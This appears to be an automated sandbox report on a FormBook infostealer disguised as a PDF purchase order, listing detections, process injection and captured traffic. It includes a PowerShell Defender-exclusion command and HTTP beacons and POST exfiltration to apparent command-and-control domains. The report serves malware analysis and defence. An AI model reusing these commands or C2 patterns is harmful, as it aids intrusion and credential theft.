Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
New PO [FK4-7173].pdf.exe

Overview

General Information

Sample name:New PO [FK4-7173].pdf.exe
Analysis ID:1552610
MD5:f946f99df4c8406ba19b70561c1d53f6
SHA1:fdce6ff15295a31ff37c517b90f466e37e272cfd
SHA256:bcd2af5fd6fdac5f0bdfcc38acbaa7d941a30cc75004c1f10731d6ad9efa7632
Tags:exeuser-threatcat_ch
Infos:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Multi AV Scanner detection for submitted file
Sigma detected: Suspicious Double Extension File Execution
Yara detected AntiVM3
Yara detected FormBook
.NET source code contains potential unpacker
.NET source code contains very large array initializations
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Found direct / indirect Syscall (likely to bypass EDR)
Initial sample is a PE file and has a suspicious name
Injects a PE file into a foreign processes
Loading BitLocker PowerShell Module
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses an obfuscated file name to hide its real file extension (double extension)
Uses shutdown.exe to shutdown or reboot the system
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Powershell Defender Exclusion
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • New PO [FK4-7173].pdf.exe (PID: 5592 cmdline: "C:\Users\user\Desktop\New PO [FK4-7173].pdf.exe" MD5: F946F99DF4C8406BA19B70561C1D53F6)
    • powershell.exe (PID: 6564 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\New PO [FK4-7173].pdf.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 1396 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • New PO [FK4-7173].pdf.exe (PID: 5316 cmdline: "C:\Users\user\Desktop\New PO [FK4-7173].pdf.exe" MD5: F946F99DF4C8406BA19B70561C1D53F6)
      • MKVNVRSuoK.exe (PID: 1568 cmdline: "C:\Program Files (x86)\rBqzZzzHcmwzxiopDSMsktNKnyKFJzhHHmutzYqlidQUGbRoAWJSJLqnMwXwwzM\MKVNVRSuoK.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • shutdown.exe (PID: 5332 cmdline: "C:\Windows\SysWOW64\shutdown.exe" MD5: FCDE5AF99B82AE6137FB90C7571D40C3)
          • MKVNVRSuoK.exe (PID: 3660 cmdline: "C:\Program Files (x86)\rBqzZzzHcmwzxiopDSMsktNKnyKFJzhHHmutzYqlidQUGbRoAWJSJLqnMwXwwzM\MKVNVRSuoK.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
          • firefox.exe (PID: 5748 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Formbook, FormboFormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.
  • SWEED
  • Cobalt
https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000004.00000002.2215511334.0000000000400000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
    00000007.00000002.4473043589.0000000002B80000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
      00000007.00000002.4472088582.00000000026C0000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
        00000009.00000002.4475014817.0000000005290000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
          00000004.00000002.2238337409.0000000003F90000.00000040.10000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
            Click to see the 4 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            4.2.New PO [FK4-7173].pdf.exe.400000.0.raw.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
              4.2.New PO [FK4-7173].pdf.exe.400000.0.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security

                Sigma Signatures

                System Summary

                barindex
                Sigma detected: Suspicious Double Extension File Execution
                Source: Process startedAuthor: Florian Roth (Nextron Systems), @blu3_team (idea), Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Users\user\Desktop\New PO [FK4-7173].pdf.exe", CommandLine: "C:\Users\user\Desktop\New PO [FK4-7173].pdf.exe", CommandLine|base64offset|contains: <, Image: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exe, NewProcessName: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exe, OriginalFileName: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1028, ProcessCommandLine: "C:\Users\user\Desktop\New PO [FK4-7173].pdf.exe", ProcessId: 5592, ProcessName: New PO [FK4-7173].pdf.exe
                Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
                Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\New PO [FK4-7173].pdf.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\New PO [FK4-7173].pdf.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\New PO [FK4-7173].pdf.exe", ParentImage: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exe, ParentProcessId: 5592, ParentProcessName: New PO [FK4-7173].pdf.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\New PO [FK4-7173].pdf.exe", ProcessId: 6564, ProcessName: powershell.exe
                Sigma detected: Powershell Defender Exclusion
                Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\New PO [FK4-7173].pdf.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\New PO [FK4-7173].pdf.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\New PO [FK4-7173].pdf.exe", ParentImage: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exe, ParentProcessId: 5592, ParentProcessName: New PO [FK4-7173].pdf.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\New PO [FK4-7173].pdf.exe", ProcessId: 6564, ProcessName: powershell.exe
                Sigma detected: Non Interactive PowerShell Process Spawned
                Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\New PO [FK4-7173].pdf.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\New PO [FK4-7173].pdf.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\New PO [FK4-7173].pdf.exe", ParentImage: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exe, ParentProcessId: 5592, ParentProcessName: New PO [FK4-7173].pdf.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\New PO [FK4-7173].pdf.exe", ProcessId: 6564, ProcessName: powershell.exe

                Suricata Signatures

                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-11-09T05:35:14.821461+010020229301A Network Trojan was detected20.12.23.50443192.168.2.549709TCP
                2024-11-09T05:35:53.868488+010020229301A Network Trojan was detected20.12.23.50443192.168.2.549910TCP

                Joe Sandbox Signatures

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Antivirus / Scanner detection for submitted sample
                Source: New PO [FK4-7173].pdf.exeAvira: detected
                Multi AV Scanner detection for submitted file
                Source: New PO [FK4-7173].pdf.exeReversingLabs: Detection: 52%
                Source: New PO [FK4-7173].pdf.exeVirustotal: Detection: 33%Perma Link
                Yara detected FormBook
                Source: Yara matchFile source: 4.2.New PO [FK4-7173].pdf.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 4.2.New PO [FK4-7173].pdf.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000004.00000002.2215511334.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.4473043589.0000000002B80000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.4472088582.00000000026C0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000009.00000002.4475014817.0000000005290000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.2238337409.0000000003F90000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.4473189897.0000000002CD0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.4473138354.0000000003040000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.2221565153.00000000015F0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                AI detected suspicious sample
                Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                Machine Learning detection for sample
                Source: New PO [FK4-7173].pdf.exeJoe Sandbox ML: detected
                Source: New PO [FK4-7173].pdf.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: New PO [FK4-7173].pdf.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: MKVNVRSuoK.exe, 00000006.00000002.4472639684.0000000000FEE000.00000002.00000001.01000000.0000000C.sdmp, MKVNVRSuoK.exe, 00000009.00000002.4472854641.0000000000FEE000.00000002.00000001.01000000.0000000C.sdmp
                Source: Binary string: wntdll.pdbUGP source: New PO [FK4-7173].pdf.exe, 00000004.00000002.2217527999.0000000001100000.00000040.00001000.00020000.00000000.sdmp, shutdown.exe, 00000007.00000002.4473382141.00000000030DE000.00000040.00001000.00020000.00000000.sdmp, shutdown.exe, 00000007.00000003.2220089885.0000000002D94000.00000004.00000020.00020000.00000000.sdmp, shutdown.exe, 00000007.00000002.4473382141.0000000002F40000.00000040.00001000.00020000.00000000.sdmp, shutdown.exe, 00000007.00000003.2215761146.0000000002BEA000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: shutdown.pdbGCTL source: New PO [FK4-7173].pdf.exe, 00000004.00000002.2216024662.0000000000CA7000.00000004.00000020.00020000.00000000.sdmp, MKVNVRSuoK.exe, 00000006.00000002.4472730066.0000000001088000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdb source: New PO [FK4-7173].pdf.exe, New PO [FK4-7173].pdf.exe, 00000004.00000002.2217527999.0000000001100000.00000040.00001000.00020000.00000000.sdmp, shutdown.exe, shutdown.exe, 00000007.00000002.4473382141.00000000030DE000.00000040.00001000.00020000.00000000.sdmp, shutdown.exe, 00000007.00000003.2220089885.0000000002D94000.00000004.00000020.00020000.00000000.sdmp, shutdown.exe, 00000007.00000002.4473382141.0000000002F40000.00000040.00001000.00020000.00000000.sdmp, shutdown.exe, 00000007.00000003.2215761146.0000000002BEA000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: shutdown.pdb source: New PO [FK4-7173].pdf.exe, 00000004.00000002.2216024662.0000000000CA7000.00000004.00000020.00020000.00000000.sdmp, MKVNVRSuoK.exe, 00000006.00000002.4472730066.0000000001088000.00000004.00000020.00020000.00000000.sdmp
                Source: C:\Windows\SysWOW64\shutdown.exeCode function: 7_2_026DC700 FindFirstFileW,FindNextFileW,FindClose,7_2_026DC700
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4x nop then jmp 0513B017h0_2_0513A5C4
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4x nop then jmp 0513B017h0_2_0513A9E5
                Source: C:\Windows\SysWOW64\shutdown.exeCode function: 4x nop then xor eax, eax7_2_026C9E20
                Source: C:\Windows\SysWOW64\shutdown.exeCode function: 4x nop then pop edi7_2_026CE336
                Source: C:\Windows\SysWOW64\shutdown.exeCode function: 4x nop then mov ebx, 00000004h7_2_02DD04E8

                Networking

                barindex
                Performs DNS queries to domains with low reputation
                Source: DNS query: www.maviro.xyz
                Source: Joe Sandbox ViewIP Address: 217.160.0.220 217.160.0.220
                Source: Joe Sandbox ViewIP Address: 217.160.0.220 217.160.0.220
                Source: Joe Sandbox ViewIP Address: 67.223.117.142 67.223.117.142
                Source: Joe Sandbox ViewASN Name: VIMRO-AS15189US VIMRO-AS15189US
                Source: Network trafficSuricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 20.12.23.50:443 -> 192.168.2.5:49709
                Source: Network trafficSuricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 20.12.23.50:443 -> 192.168.2.5:49910
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: global trafficHTTP traffic detected: GET /2t4j/?J8LHgDJp=76BBSHLebMFInx415ME5nsaWAX7vqpkDMKUIFXyWJTjkcZQycFcIpYDenhjJ2rT89sPaLHitdl181guZmt6MFlr0ftv27uO4BWOF65kRMGEDoBp+CAe+LLLR26U78pjUdQ==&aF=JLp4o0Qx2F-p4F HTTP/1.1Host: www.tubetrexhd.buzzAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,en;q=0.5Connection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.4; One X Build/KTU84Q) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
                Source: global trafficHTTP traffic detected: GET /t61z/?J8LHgDJp=QbhiOx00h/rFbDhCzcx72F6h1mdg1yJMVj9Qvc8sejmtB5T8qlwycmwhvDAYX2QAFqqRkYoUzkyWExrL+4KEHOogqLXxPl8o8avUe8e/R2yv7tJPERVtmQXUL45HQRgD9g==&aF=JLp4o0Qx2F-p4F HTTP/1.1Host: www.moneta.lifeAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,en;q=0.5Connection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.4; One X Build/KTU84Q) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
                Source: global trafficHTTP traffic detected: GET /n1dp/?J8LHgDJp=ryeBbJYUvalC4Gf2UXy7Qc/r17vTzADlU+kriaheCGn+31zAxY9EcJfSGqt2t+ma9yg9hIhC3ppYERZTlK/9H+6asqo2CGRUX6V95R7Z3XOuyoyAAN44PtQ+X9f95w6KKw==&aF=JLp4o0Qx2F-p4F HTTP/1.1Host: www.mjmegartravel.onlineAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,en;q=0.5Connection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.4; One X Build/KTU84Q) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
                Source: global trafficHTTP traffic detected: GET /q6od/?J8LHgDJp=LfsI10JCm28n9wRtu+WKZQZOOeP2R4+f5k1rV9zDAVl7gnOY+STnccMWAxzuycS6lIdYQVNguf/7P6n2dnZScMvaSF16brm/Uh4MwjbERtDYretDLoFMjBxL8OHqrNB6Qw==&aF=JLp4o0Qx2F-p4F HTTP/1.1Host: www.digitaladpro.shopAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,en;q=0.5Connection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.4; One X Build/KTU84Q) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
                Source: global trafficHTTP traffic detected: GET /ylto/?J8LHgDJp=uYv4kBsD3a2LIu39RI2EN5QaJ/QGWlTF0j2ZxsKcJFSdquhIvwsPj5Km9wQw9lg3VAI27qB+9KUHV5rrvR7hLmJ3jtEB7TDQFLuda37LuGp+gEzOJmBCc5BPpe4hsE5s8g==&aF=JLp4o0Qx2F-p4F HTTP/1.1Host: www.omnibizlux.bizAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,en;q=0.5Connection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.4; One X Build/KTU84Q) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
                Source: global trafficHTTP traffic detected: GET /fdhm/?J8LHgDJp=LvSy2RgWDp4XGg9UUwSL95nwMTpQ1E5XJngg5CsNqq22kikTstX/mPq/7EMqvdfjgfwUWsD0UoRe2cy8XzVdEttk7M0krM2NWyLTMEkrELr+3VPpc3E0q8VpqI+fnYrBcQ==&aF=JLp4o0Qx2F-p4F HTTP/1.1Host: www.energyparks.netAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,en;q=0.5Connection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.4; One X Build/KTU84Q) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
                Source: global trafficHTTP traffic detected: GET /e3rr/?J8LHgDJp=IgJ9cBvr78oV/XAx6CGZHJrYQ+q7gdvT6YSgAnJN3Ii+ka2zR4pFTGuYtard36/gOxMLoedf5n7SHRQ/SfZ0+VwBsW9Pxqn6Ah8T9/ZStSyIEzKK6cN23N3L3zzTI9ofHg==&aF=JLp4o0Qx2F-p4F HTTP/1.1Host: www.estrela-b.onlineAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,en;q=0.5Connection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.4; One X Build/KTU84Q) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
                Source: global trafficHTTP traffic detected: GET /2493/?aF=JLp4o0Qx2F-p4F&J8LHgDJp=jH4Cb08gek16/2FqI6arh4PQxRW9qayf8vOptAV1ciloHQcwXJuEWMhJ8+kmyy6nu0+F87CgCWTPmYOVFW7qHeowlszl5iXL8EHw53KjcBxSho9HkZ7HZn7te055AXvZAw== HTTP/1.1Host: www.winspinoffr.proAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,en;q=0.5Connection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.4; One X Build/KTU84Q) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
                Source: global trafficHTTP traffic detected: GET /hcih/?J8LHgDJp=4I/0J6YfWYwRno7rH0k2bI6cVdalKpPNFcVIT9hZ02dsPRsaZO23kVRDbCaRJTowDBACcCwGuYsZ/ib1kw640ghKfTJpeVfXv/8QQFzliEtlwJs4R/u7+hsr/ZpE446a8w==&aF=JLp4o0Qx2F-p4F HTTP/1.1Host: www.maviro.xyzAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,en;q=0.5Connection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.4; One X Build/KTU84Q) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
                Source: global trafficHTTP traffic detected: GET /21bn/?aF=JLp4o0Qx2F-p4F&J8LHgDJp=LUH9mU7gyodu165Py4LvPMqvM6tVT1yZnoho0cb8kzCV8K1cnf0TlkgJLscSA+u/wE57w1zHLj7MmynPemRfd+7x471fFzVs5Vj8lBvl1x4666HrkdrwF1YQmmc6Rlfi/w== HTTP/1.1Host: www.thefokusdong43.clickAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,en;q=0.5Connection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.4; One X Build/KTU84Q) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
                Source: global trafficHTTP traffic detected: GET /9lti/?J8LHgDJp=geiaNc/IHvVr1XtPIeaNP3WF7XhVraHppqovBYUyzl5ecV5+b9ApcmryUDB5zfHGxHwTi5lfOLOrSi1EPqCbf0z3Xdxd0TcO0Ng9DzbN/wxAK8CjGZPvJp4ddlq6R6JTvg==&aF=JLp4o0Qx2F-p4F HTTP/1.1Host: www.7fh27o.vipAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,en;q=0.5Connection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.4; One X Build/KTU84Q) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
                Source: global trafficHTTP traffic detected: GET /42c3/?J8LHgDJp=JBDdfBWF/aARUf0PyG02RiIz2qli5PW+5nwTlGpfB1DrZY6QfIB5cxII436r+j2NvU2wp2AeqQG6cs1IYMUL87i7oiU5+htQ/rMuVW1JPNoYDo0Ha8BBXEhHg5ia/a4jMw==&aF=JLp4o0Qx2F-p4F HTTP/1.1Host: www.eyecatch.proAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,en;q=0.5Connection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.4; One X Build/KTU84Q) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
                Source: global trafficHTTP traffic detected: GET /fjmy/?J8LHgDJp=c5JK8yKqbpJXnVX35yNvpk4it4zCfLCuqqKaPXgDxgb5kUsYKBWi9fZhBVM/jAdIGDw0KxxisAN8tQ7jqzqBhav6DGIeWiTI6vrrd/bXxPUrtdAQLIqbusoQJp9p3rxIBg==&aF=JLp4o0Qx2F-p4F HTTP/1.1Host: www.t95yd.topAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,en;q=0.5Connection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.4; One X Build/KTU84Q) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
                Source: global trafficHTTP traffic detected: GET /xlhb/?aF=JLp4o0Qx2F-p4F&J8LHgDJp=WDmEkFMJCPM0vAdoEgsDaI2zUw+I3BUP6f65xhueHOQTowQnu/4Hj56WOua05lBgvGSvVDcmYnsn0HKnK8OdiO87PbUZXBqH6/yEH6S1yhxHCm7aRAizBR0GDl9YCJCE3A== HTTP/1.1Host: www.sonoscan.orgAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,en;q=0.5Connection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.4; One X Build/KTU84Q) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
                Source: global trafficDNS traffic detected: DNS query: www.tubetrexhd.buzz
                Source: global trafficDNS traffic detected: DNS query: www.rka6460.online
                Source: global trafficDNS traffic detected: DNS query: www.moneta.life
                Source: global trafficDNS traffic detected: DNS query: www.mjmegartravel.online
                Source: global trafficDNS traffic detected: DNS query: www.digitaladpro.shop
                Source: global trafficDNS traffic detected: DNS query: www.omnibizlux.biz
                Source: global trafficDNS traffic detected: DNS query: www.energyparks.net
                Source: global trafficDNS traffic detected: DNS query: www.estrela-b.online
                Source: global trafficDNS traffic detected: DNS query: www.winspinoffr.pro
                Source: global trafficDNS traffic detected: DNS query: www.maviro.xyz
                Source: global trafficDNS traffic detected: DNS query: www.thefokusdong43.click
                Source: global trafficDNS traffic detected: DNS query: www.7fh27o.vip
                Source: global trafficDNS traffic detected: DNS query: www.eyecatch.pro
                Source: global trafficDNS traffic detected: DNS query: www.t95yd.top
                Source: global trafficDNS traffic detected: DNS query: www.sonoscan.org
                Source: global trafficDNS traffic detected: DNS query: www.jllllbx.top
                Source: unknownHTTP traffic detected: POST /t61z/ HTTP/1.1Host: www.moneta.lifeAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brContent-Length: 209Cache-Control: max-age=0Content-Type: application/x-www-form-urlencodedConnection: closeOrigin: http://www.moneta.lifeReferer: http://www.moneta.life/t61z/User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; One X Build/KTU84Q) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36Data Raw: 4a 38 4c 48 67 44 4a 70 3d 64 5a 4a 43 4e 47 39 58 6a 37 44 76 41 69 39 65 6a 70 49 6b 7a 47 48 59 77 68 39 59 35 44 6c 42 56 44 4a 53 6b 62 6f 49 63 68 32 69 42 4e 4c 2f 6b 43 34 65 43 32 73 68 78 51 4d 56 41 6b 39 4c 50 36 4f 49 37 4c 63 6a 6b 69 36 4b 45 32 66 31 32 4b 4f 51 4c 39 45 70 33 64 48 53 41 46 52 36 7a 59 6a 53 57 4e 62 78 50 46 4b 7a 30 66 4a 48 65 68 41 72 71 51 4c 51 62 71 68 54 51 68 46 68 72 31 76 66 2b 39 63 63 38 75 53 2b 6f 35 4e 49 79 6d 50 6c 47 4b 53 4e 44 58 7a 48 4b 50 52 74 4c 47 4a 62 2f 67 79 32 55 68 36 66 72 4d 47 75 65 2f 74 64 41 79 38 38 4f 31 51 68 38 39 4f 6c 48 67 42 35 68 69 6f 3d Data Ascii: 